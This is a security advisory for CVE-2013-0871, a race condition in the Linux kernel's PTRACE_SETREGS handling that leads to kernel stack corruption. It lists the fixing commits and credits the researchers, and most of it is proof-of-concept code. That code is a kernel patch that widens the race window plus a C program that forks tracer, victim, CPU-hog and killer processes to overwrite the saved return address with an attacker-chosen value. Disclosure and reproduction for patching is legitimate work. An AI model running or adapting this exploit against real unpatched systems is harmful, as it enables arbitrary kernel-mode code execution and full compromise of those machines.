Linux kernel stack corruption due to race condition with PTRACE_SETREGS
-----------------------------------------------------------------------
A race condition in ptrace can lead to kernel stack corruption and arbitrary
kernel-mode code execution. At first glance, this may be the worst Linux kernel vulnerability
in a few years, according to Alexander AKA Solar Designer (solar@openwall.com). He goes
on to say "For distro vendor kernels (rather than mainline, which was patched almost a
month ago), this is a 0-day."
This should be tracked as CVE-2013-0871.
Solution
------------
The following commits from Oleg Nesterov should address the issue:
- 910ffdb18a6408e14febbb6e4b6840fd2c928c82
- 9899d11f654474d2d54ea52ceaa2a1f4db3abd68
- 9067ac85d533651b98c2ff903182a20cbb361fcb
Credit
---------
This was discovered by Suleiman Souhlal and Salman Qazi of Google, with help
from Aaron Durbin and Michael Davidson, also of Google.
Code
--------
Salman Qazi provided the following PoC code:
Kernel patch for easy reproduction:
diff --git a/arch/x86/kernel/ptrace.c b/arch/x86/kernel/ptrace.c
index b629bbe..e22617e 100644
--- a/arch/x86/kernel/ptrace.c
+++ b/arch/x86/kernel/ptrace.c
@@ -24,6 +24,7 @@
#include <linux/rcupdate.h>
#include <linux/module.h>
#include <linux/context_tracking.h>
+#include <linux/delay.h>
#include <asm/uaccess.h>
#include <asm/pgtable.h>
@@ -902,6 +903,12 @@ long arch_ptrace(struct task_struct *child, long request,
datap);
case PTRACE_SETREGS: /* Set all gp regs in the child. */
+ if (!strcmp(current->comm, "ptrace_death")) {
+ int i;
+ WARN_ON_ONCE(1);
+ for (i = 0 ; i < 15; i++)
+ mdelay(10);
+ }
return copy_regset_from_user(child,
task_user_regset_view(current),
REGSET_GENERAL,
source code for ptrace_death:
/*
* Repro case for SETREGS arbitrary ring zero execution bug.
*
* The specific scenario that we attempt to create:
*
* V does a syscall. It is being traced by P. P
* upon stopping V with PTRACE_SYSCALL and waiting for it, proceeds
* to read its registers. At this time P is asleep and an RT process S
* starts running.
*
* Then P proceeds to write V's registers, and shortly after it has done this
* another process K kills V. Process S goes to sleep permitting V
* space to run. V wakes up from its waiting state and heads for the exit.
* But, S quickly wakes up again by the time V has reached schedule(). V
* is no longer running (since S has the CPU)
* and P modifies its regs. When V finally starts running
* and returns from schedule(), it pops an incorrect value from the
* stack. The reason is that the stack on which schedule() is called
* does not have the final 6 registers in pt_regs on it. That means that
* when P modifies V's registers, it is actually overwriting the stack
* frame saved for schedule(), including the return RIP.
*
* V and S are pinned to CPU 0. S is an RT task so that it can control
* when V does and doesn't run.
* The remaining processes are not allowed on CPU 0.
*
*/
#include <sched.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <stdlib.h>
#include <stdio.h>
#include <assert.h>
#include <signal.h>
#include <unistd.h>
/* S */
/*
 * Fork the CPU-hogging helper process (S in the scenario description).
 *
 * The child switches itself to SCHED_FIFO at the minimum FIFO priority,
 * restricts itself to affinity mask 1 (bit 0, i.e. CPU 0), sleeps for
 * 120000 us and then busy-loops. When its counter reaches 50000 it sleeps
 * for 10 us exactly once and prints "x"; afterwards it spins until killed.
 *
 * Returns the result of fork() in the parent: the child's pid, or -1 if the
 * fork failed. The child never returns from this function.
 *
 * Note: the scheduler calls sit inside assert(), so they are compiled out
 * when building with NDEBUG.
 */
int nuke_cpu(void)
{
	int pid0;
	int i;
	unsigned long mask = 1;

	pid0 = fork();
	if (!pid0) {
		struct sched_param p = {0};

		p.sched_priority = sched_get_priority_min(SCHED_FIFO);
		assert(!sched_setscheduler(0, SCHED_FIFO, &p));
		assert(!sched_setaffinity(0, sizeof(mask), &mask));
		i = 0;
		usleep(120000);
		while (1) {
			if (i == 50000) {
				/* Briefly yield the CPU, then take it back. */
				usleep(10);
				printf("x");
				fflush(stdout);
			}
			/*
			 * Stop counting once the one-shot trigger has fired:
			 * incrementing forever would overflow the signed
			 * counter, which is undefined behaviour.
			 */
			if (i <= 50000)
				i++;
		}
	}
	return pid0;
}
/*
 * Run one attempt at the PTRACE_SETREGS race.
 *
 * The caller becomes the tracer P. It forks the victim V, which loops
 * forever loading 0x1eadbeef into rbx, rbp and r12-r15 and issuing syscall
 * number 0x6d. P attaches to V, moves itself to affinity mask 0xfffe
 * (everything in the low 16 bits except CPU 0), stops V at a syscall
 * boundary, reads its registers, starts the CPU hog S via nuke_cpu(), forks
 * the killer K (which SIGKILLs V after 120000 us) and then writes V's
 * registers back with orig_rax changed to 0x3c.
 *
 * Progress markers on stdout: "{" before PTRACE_SETREGS, "+" or "-" for its
 * success or failure, "." from K after it has sent SIGKILL.
 *
 * This function does not return: V loops forever, P ends in exit(0), and a
 * failed fork() trips the PTRACE_ATTACH assertion.
 *
 * Note: several required calls sit inside assert(), so they are compiled
 * out when building with NDEBUG.
 */
int once()
{
	int pid;
	unsigned long mask = 1;
	struct user_regs_struct regs;

	/* Pin to CPU 0 before forking; presumably V inherits this affinity. */
	assert(!sched_setaffinity(0, sizeof(mask), &mask));
	pid = fork();
	if (!pid) {
		/* V */
		while (1) {
			/*
			 * Put our chosen RIP in callee saved registers.
			 *
			 * rcx and r11 are listed as clobbers because the
			 * syscall instruction overwrites them. rbp is written
			 * too, but is left out of the list because GCC rejects
			 * it as a clobber while it serves as frame pointer.
			 */
			asm __volatile__ (
				"mov $0x1eadbeef, %%rbx\n"
				"mov $0x1eadbeef, %%rbp\n"
				"mov $0x1eadbeef, %%r12\n"
				"mov $0x1eadbeef, %%r13\n"
				"mov $0x1eadbeef, %%r14\n"
				"mov $0x1eadbeef, %%r15\n"
				"mov $0, %%rsi\n"
				"mov $0, %%rdi\n"
				"mov $0x6d, %%rax\n"
				"syscall":::"rax", "rsi", "rdi", "rcx", "r11",
				"rbx", "r12", "r13", "r14", "r15");
		}
	} else {
		/* P */
		assert(!ptrace(PTRACE_ATTACH, pid, 0, 0));
		wait(NULL);
		assert(!ptrace(PTRACE_SETOPTIONS, pid, NULL,
			       PTRACE_O_TRACESYSGOOD |
			       PTRACE_O_TRACEFORK |
			       PTRACE_O_TRACEVFORK |
			       PTRACE_O_TRACECLONE));
		while (1) {
			int nuke_pid;
			int pid2;

			/* Move the tracer off CPU 0, leaving it to V and S. */
			mask = 0xfffe;
			assert(!sched_setaffinity(0, sizeof(mask), &mask));

			/* Entry */
			assert(!ptrace(PTRACE_SYSCALL, pid, NULL, 0, 0));
			wait(NULL);
			assert(!ptrace(PTRACE_GETREGS, pid, NULL, &regs));

			nuke_pid = nuke_cpu();
			regs.orig_rax = 0x3c;

			pid2 = fork();
			if (!pid2) {
				/* K */
				usleep(120000);
				kill(pid, SIGKILL);
				printf(".");
				fflush(stdout);
				exit(0);
			}

			printf("{");
			fflush(stdout);
			if (!ptrace(PTRACE_SETREGS, pid, NULL, &regs)) {
				printf("+");
			} else {
				printf("-");
			}

			/*
			 * NOTE(review): SIGKILL is passed as a fifth argument
			 * here, beyond the four documented for ptrace(2); the
			 * data argument itself is 0. Confirm the intent.
			 */
			ptrace(PTRACE_CONT, pid, NULL, 0, SIGKILL);

			/* Tear down V, K and S before this attempt ends. */
			kill(pid, SIGKILL);
			kill(pid2, SIGKILL);
			kill(nuke_pid, SIGKILL);
			exit(0);
		}
	}
}
/*
 * Driver: repeat the race attempt forever.
 *
 * Each round forks a fresh process that runs once(); the parent waits for
 * one child to change state before starting the next round.
 */
int main(void)
{
	for (;;) {
		int child = fork();

		if (child == 0)
			once();

		wait(NULL);
	}
}
//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. Neither Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information.